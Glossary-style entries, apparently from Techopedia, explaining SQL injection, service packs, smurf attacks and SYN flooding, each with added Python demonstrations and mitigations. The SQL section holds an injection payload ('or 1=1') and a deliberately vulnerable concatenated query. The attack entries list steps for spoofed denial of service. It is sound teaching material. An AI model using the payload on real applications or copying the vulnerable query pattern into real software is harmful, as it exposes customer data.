Let's go through an example of an SQL injection attack. An application running a bank's operations contains a menu used to search for customer details by data points such as the customer's Social Security number. In the background the application builds an SQL query from the entered search value and runs it against the database (the table name clients is illustrative):

SELECT client_name, telephone, address, date_of_birth FROM clients WHERE social_sec_no=23425

In this sample, the user enters the value 23425 in the application window that asks for the Social Security number, and the query runs with that value. A user with SQL knowledge may understand the application and, instead of entering a single value, enter the string "23425 or 1=1", which is passed to the database as follows:

SELECT client_name, telephone, address, date_of_birth FROM clients WHERE social_sec_no=23425 or 1=1

The vulnerability is that the user's text is concatenated into the statement, so it is parsed as SQL rather than treated as a value. The condition 1=1 is always true, and because the WHERE clause now reads "social_sec_no=23425 or 1=1", the query returns every row in the table, which was not the original intention. This example is simple, but it shows how an attacker can trick the application into running a backend database query or command of the attacker's choosing; other payloads can extract data from unrelated tables, modify or delete rows, or, depending on the database account's privileges, run operating system commands.

SQL injection is mitigated by proper application design, especially in modules that take user input to run database queries or commands: use parameterized queries (prepared statements) so that input is always bound as data, validate input against the expected type and format, and run the application with a database account that has the least privilege it needs. In the above example, the application could additionally be changed so that it accepts a single numeric value only.
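The following is an added example, not code from the original page: the bank lookup from the text run against an in-memory SQLite table, once with the search value concatenated into the query and once with it bound as a parameter, plus the numeric-only validation the text suggests. The table, its three rows and the column layout are constructed for this illustration.

```python
# Added example, not from the original page: the bank lookup from the text run
# against an in-memory SQLite table, once with the search value concatenated
# into the query and once with a bound parameter. The table, its three rows
# and the column names are constructed for this illustration.
import sqlite3

COLUMNS = "client_name, telephone, address, date_of_birth"


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE clients (client_name TEXT, telephone TEXT, address TEXT, "
        "date_of_birth TEXT, social_sec_no INTEGER)"
    )
    conn.executemany(
        "INSERT INTO clients VALUES (?, ?, ?, ?, ?)",
        [
            ("Ada Lovelace", "555-0101", "1 Analytical St", "1815-12-10", 23425),
            ("Alan Turing", "555-0102", "2 Bletchley Rd", "1912-06-23", 31337),
            ("Grace Hopper", "555-0103", "3 Compiler Ave", "1906-12-09", 40404),
        ],
    )
    return conn


def lookup_vulnerable(conn, ssn_input: str):
    # The user-supplied text becomes part of the SQL statement itself.
    query = f"SELECT {COLUMNS} FROM clients WHERE social_sec_no={ssn_input}"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, ssn_input):
    # The value is bound as data: "23425 or 1=1" is compared as one string and
    # matches nothing. Parameterization is the primary fix.
    query = f"SELECT {COLUMNS} FROM clients WHERE social_sec_no=?"
    return conn.execute(query, (ssn_input,)).fetchall()


def valid_ssn(ssn_input: str) -> bool:
    # The page's suggested fix: accept a single numeric value only. Useful as
    # defence in depth, not a substitute for parameterized queries.
    return ssn_input.isdigit() and len(ssn_input) <= 9


def lookup_safe(conn, ssn_input: str):
    if not valid_ssn(ssn_input):
        return []
    return lookup_parameterized(conn, int(ssn_input))


if __name__ == "__main__":
    conn = setup_db()
    print(lookup_vulnerable(conn, "23425"))            # one row
    print(lookup_vulnerable(conn, "23425 or 1=1"))     # every row in the table
    print(lookup_safe(conn, "23425 or 1=1"))           # []
```

Note that the column list is still built with an f-string: that is acceptable only because COLUMNS is a constant in the program, never user input. Parameter binding covers values, not identifiers, so any user-influenced table or column name needs an allowlist instead.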
Service Pack
Definition - What does Service Pack (SP) mean?
A service pack (SP) is a bundle of patches and upgrades that complements an established operating system (OS) and its software programs. An SP is a collection of software patches and security fixes that removes errors and bugs, modifies components or adds new features. Its purpose is to improve on earlier versions. Most major software vendors release service packs annually or as required.

Techopedia explains Service Pack (SP)
Software applications, such as Microsoft Windows, are built from millions of lines of source code and thousands of files, processes and components. These components provide multiple utilities and functions via built-in processes, which are vulnerable to errors, bugs and other performance-inhibiting factors. After a software application is released, SPs gather the fixes, updates and added functionality for its components, solutions and services into one comprehensive set. SPs can be either incremental or cumulative: an incremental SP contains only the updates and fixes released since the previous one, whereas a cumulative SP includes everything from all previous SPs.
Smurf Attack
Definition - What does Smurf Attack mean?
A smurf attack is a type of denial of service attack in which a victim is flooded with ICMP echo replies (ping responses) triggered by spoofed ping requests. This creates high network traffic on the victim's network, which often renders it unresponsive. Smurfing exploits two well-known features of the Internet Protocol and the Internet Control Message Protocol (ICMP): hosts answer ICMP echo requests automatically, and a packet sent to a network's broadcast address is delivered to every host on that network. ICMP is used by network administrators to exchange information about network state and to ping other nodes to determine their operational status. The smurf program sends ICMP echo requests to a broadcast address with the source address spoofed to the victim's IP address, so every host on the amplifying network sends its echo reply to the victim. A large number of requests, each multiplied by the number of responding hosts, can make the victim's network unusable for real traffic.

Techopedia explains Smurf Attack
The following steps make up a smurf attack:
- The attacker sends large numbers of ICMP echo requests to the broadcast address of an intermediary network (the amplifier)
- The source IP address of each request is spoofed to be the victim's address
- Every host on the amplifier network responds with an echo reply sent to the victim
This creates a significant amount of traffic on the victim's network, consuming its bandwidth and ultimately making the victim's server unreachable. To prevent a smurf attack, individual hosts and routers can be configured not to respond to ping requests sent to broadcast addresses. Routers can also be configured not to forward packets directed to broadcast addresses (on Cisco IOS this is the no ip directed-broadcast setting, which has been the default for many years), which removes the amplifier the attack depends on.
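The following is an added example, not code from the original page: the two router-side checks described above (refusing to forward packets to a directed broadcast address, and flagging echo requests aimed at one) applied to a constructed packet list. The local networks and all addresses use documentation ranges and are assumptions for this illustration.

```python
# Added example, not from the original page: the two router-side checks
# described above, applied to a constructed packet list. The local networks
# and the addresses use documentation ranges and are assumptions.
import ipaddress
from collections import Counter

# Networks this router serves (assumed). Their broadcast addresses are the
# amplifier targets a smurf attacker would aim at.
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24"), ipaddress.ip_network("198.51.100.0/24")]

# Constructed traffic: the attacker pings the broadcast addresses of both
# subnets with the source spoofed to the victim 203.0.113.5; the last two
# packets are ordinary traffic.
PACKETS = [
    {"src": "203.0.113.5",  "dst": "192.0.2.255",    "proto": "icmp", "type": "echo-request"},
    {"src": "203.0.113.5",  "dst": "192.0.2.255",    "proto": "icmp", "type": "echo-request"},
    {"src": "203.0.113.5",  "dst": "198.51.100.255", "proto": "icmp", "type": "echo-request"},
    {"src": "198.51.100.7", "dst": "192.0.2.10",     "proto": "icmp", "type": "echo-request"},
    {"src": "192.0.2.10",   "dst": "198.51.100.7",   "proto": "tcp",  "type": "syn"},
]


def is_directed_broadcast(dst: str, nets=LOCAL_NETS) -> bool:
    addr = ipaddress.ip_address(dst)
    return any(addr == net.broadcast_address for net in nets)


def should_forward(pkt: dict, nets=LOCAL_NETS) -> bool:
    """Router policy equivalent to 'no ip directed-broadcast': never deliver a
    routed packet to a subnet's broadcast address."""
    return not is_directed_broadcast(pkt["dst"], nets)


def smurf_indicators(packets, nets=LOCAL_NETS) -> Counter:
    """Count echo requests aimed at a directed broadcast, keyed by the (spoofed)
    source address, which is the likely victim."""
    hits = Counter()
    for pkt in packets:
        if (pkt["proto"] == "icmp" and pkt["type"] == "echo-request"
                and is_directed_broadcast(pkt["dst"], nets)):
            hits[pkt["src"]] += 1
    return hits


def amplification(dst: str, nets=LOCAL_NETS) -> int:
    # Upper bound on replies one broadcast echo request can trigger: the number
    # of usable host addresses on that subnet. A unicast ping gets one reply.
    for net in nets:
        if ipaddress.ip_address(dst) == net.broadcast_address:
            return net.num_addresses - 2
    return 1


if __name__ == "__main__":
    for pkt in PACKETS:
        print(pkt["src"], "->", pkt["dst"], "forward" if should_forward(pkt) else "DROP",
              "x%d" % amplification(pkt["dst"]))
    print("victims:", dict(smurf_indicators(PACKETS)))
```

The amplification figure is what makes the attack worthwhile: one 64-byte request to a /24 can produce up to 254 replies at the victim, so dropping directed broadcasts at the router removes the multiplier even if hosts still answer pings.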
SYN Flooding
Definition - What does SYN Flooding mean?
SYN flooding is a type of denial of service attack in which an attacker sends a continuous stream of TCP SYN requests to a target server, each of which the server must track as a half-open connection, until the server's connection resources are exhausted and it becomes unresponsive. It is used by an attacker to keep the target from serving legitimate user requests and possibly crash it. SYN flooding is also called a SYN attack.

Techopedia explains SYN Flooding
SYN flooding exploits the TCP three-way handshake. Normally a client sends a SYN, the server replies with a SYN-ACK and reserves state for the half-open connection in its listen backlog, and the client completes the handshake with an ACK. In an attack, the attacker sends SYN packets, usually with spoofed source addresses, to one or more open ports; the server answers each with a SYN-ACK (a closed port answers with a RST and allocates nothing) and waits for the final ACK. The attacker never sends that ACK, so each entry stays half-open until it times out, while new SYNs keep arriving. Once the backlog is full, the server drops SYNs from legitimate clients and they cannot connect at all. Defences include SYN cookies, which encode the connection state in the server's initial sequence number instead of storing it, shorter half-open timeouts, larger backlogs and rate limiting of SYNs per source.
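The following is an added example, not code from the original page: a model of a listening socket's half-open backlog under a SYN flood, first with ordinary state-keeping and then with a simplified SYN cookie. The backlog size, the per-server secret and the cookie layout (5-bit time slot plus 24-bit keyed hash of the connection 4-tuple) are assumptions for this illustration; real implementations also encode the client's MSS and use finer-grained timers.

```python
# Added example, not from the original page: a model of a listening socket's
# half-open backlog under a SYN flood, first with ordinary state-keeping and
# then with a simplified SYN cookie. The backlog size, secret and cookie layout
# are assumptions; real implementations also encode the MSS and use finer timers.
import hashlib
import hmac
import secrets

SECRET = secrets.token_bytes(16)   # server-side secret for cookie generation


def syn_cookie(src_ip: str, src_port: int, dst_port: int, t: int, secret: bytes = SECRET) -> int:
    """32-bit initial sequence number: 5-bit time counter + 24-bit keyed hash of
    the connection 4-tuple. Nothing needs to be stored to verify it later."""
    msg = f"{src_ip}|{src_port}|{dst_port}|{t}".encode()
    h = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")
    return ((t & 0x1F) << 24) | h


def check_cookie(isn: int, src_ip: str, src_port: int, dst_port: int, now: int,
                 secret: bytes = SECRET) -> bool:
    # Accept cookies minted in the current or the previous time slot.
    return any(syn_cookie(src_ip, src_port, dst_port, t, secret) == isn for t in (now, now - 1))


class Listener:
    def __init__(self, port: int, backlog: int, syn_cookies: bool = False):
        self.port = port
        self.backlog = backlog
        self.syn_cookies = syn_cookies
        self.half_open = {}     # (src_ip, src_port) -> server ISN

    def on_syn(self, src_ip: str, src_port: int, now: int):
        """Returns ('SYN-ACK', isn) or ('DROP', None)."""
        if self.syn_cookies:
            # Stateless: the ISN itself is the proof, so the backlog cannot fill.
            return "SYN-ACK", syn_cookie(src_ip, src_port, self.port, now)
        if len(self.half_open) >= self.backlog:
            return "DROP", None      # backlog exhausted: legitimate clients lose
        isn = secrets.randbelow(1 << 32)
        self.half_open[(src_ip, src_port)] = isn
        return "SYN-ACK", isn

    def on_ack(self, src_ip: str, src_port: int, ack: int, now: int) -> bool:
        """Third handshake step: the client's ack must equal our ISN + 1."""
        if self.syn_cookies:
            return check_cookie((ack - 1) & 0xFFFFFFFF, src_ip, src_port, self.port, now)
        key = (src_ip, src_port)
        if key in self.half_open and self.half_open[key] + 1 == ack:
            del self.half_open[key]
            return True
        return False


def flood_then_connect(use_cookies: bool, attack_syns: int = 50) -> bool:
    """Spoof `attack_syns` SYNs that never complete, then try a real handshake.
    Returns whether the legitimate client got connected."""
    srv = Listener(port=443, backlog=8, syn_cookies=use_cookies)
    for i in range(attack_syns):
        srv.on_syn(f"203.0.113.{i % 250 + 1}", 40000 + i, now=1)   # spoofed sources
    state, isn = srv.on_syn("198.51.100.9", 51515, now=2)
    if state == "DROP":
        return False
    return srv.on_ack("198.51.100.9", 51515, isn + 1, now=2)


if __name__ == "__main__":
    print("without SYN cookies, legitimate client connected:", flood_then_connect(False))
    print("with SYN cookies, legitimate client connected:   ", flood_then_connect(True))
```

The spoofed SYNs never produce an ACK, so in the stateful listener they occupy the backlog until a timeout that this model never reaches, and the real client is dropped. With cookies the server stores nothing per SYN; only a client that really received the SYN-ACK can return the matching value, which is exactly what a spoofing attacker cannot do.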
